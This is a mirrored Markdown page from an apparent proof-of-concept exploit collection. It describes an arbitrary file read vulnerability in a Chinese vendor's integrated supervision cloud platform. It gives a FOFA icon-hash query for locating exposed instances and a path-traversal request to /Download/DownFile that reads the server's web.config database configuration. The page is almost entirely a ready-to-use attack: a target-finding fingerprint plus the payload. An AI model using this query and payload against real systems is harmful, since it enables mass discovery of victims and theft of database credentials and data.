mirror of
https://github.com/wy876/POC.git
synced 2025-02-27 04:39:25 +00:00
18 lines
434 B
Markdown
18 lines
434 B
Markdown
|
|
## 中科智远科技-综合监管云平台DownFile存在任意文件读取漏洞
|
||
|
|
|
||
|
|
中科智远科技-综合监管云平台 /Download/DownFile 存在任意文件读取漏洞,读取数据库配置文件导致数据泄露。
|
||
|
|
|
||
|
|
|
||
|
|
## fofa
|
||
|
|
|
||
|
|
```
|
||
|
|
icon_hash="-227059202"
|
||
|
|
```
|
||
|
|
|
||
|
|
## poc
|
||
|
|
|
||
|
|
```
|
||
|
|
/Download/DownFile?fileName=../web.config
|
||
|
|
```
|
||
|
|
|
||
|
|

|